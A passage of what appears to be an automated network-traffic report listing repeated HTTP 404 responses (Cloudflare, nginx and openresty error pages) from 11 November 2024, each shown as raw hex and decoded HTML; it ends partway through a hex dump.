    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:35:04 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MJiUugFuator45Efysh1gibMhXPmo%2Bb6HH0jrBTYky%2BIRwCHsgl5%2By%2B3h%2BPW45sBDx9zPR%2Fcv5Uc8OzwuOUZD0PmzkdBGAmAjLLpEBxhS3vI6xeREDxjlzLrj8pmfQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e1009630817422f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1236&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2464680&cwnd=251&unsent_bytes=0&cid=60d719d5bbb6fb72&ts=1355&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:35:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4NET2WR9%2FwTbZSCRThkcXg6sf35VPYv%2FcoT27yeOvT2zzuT28d4qTBDjGR3aXNqiPSrD%2FWZvZ6nmEAr0XoMgIrqDBpezhm6TF6O400VZVpmGqz0J9vJam1lQvfs8BA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e10096fdadf8c21-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1440&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=1987645&cwnd=251&unsent_bytes=0&cid=37722d2a241cb4e3&ts=800&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:33:08 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:33:08 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:33:10 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:33:11 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:33:14 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:33:15 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:33:20 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:33:20 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:33:34 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:33:34 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 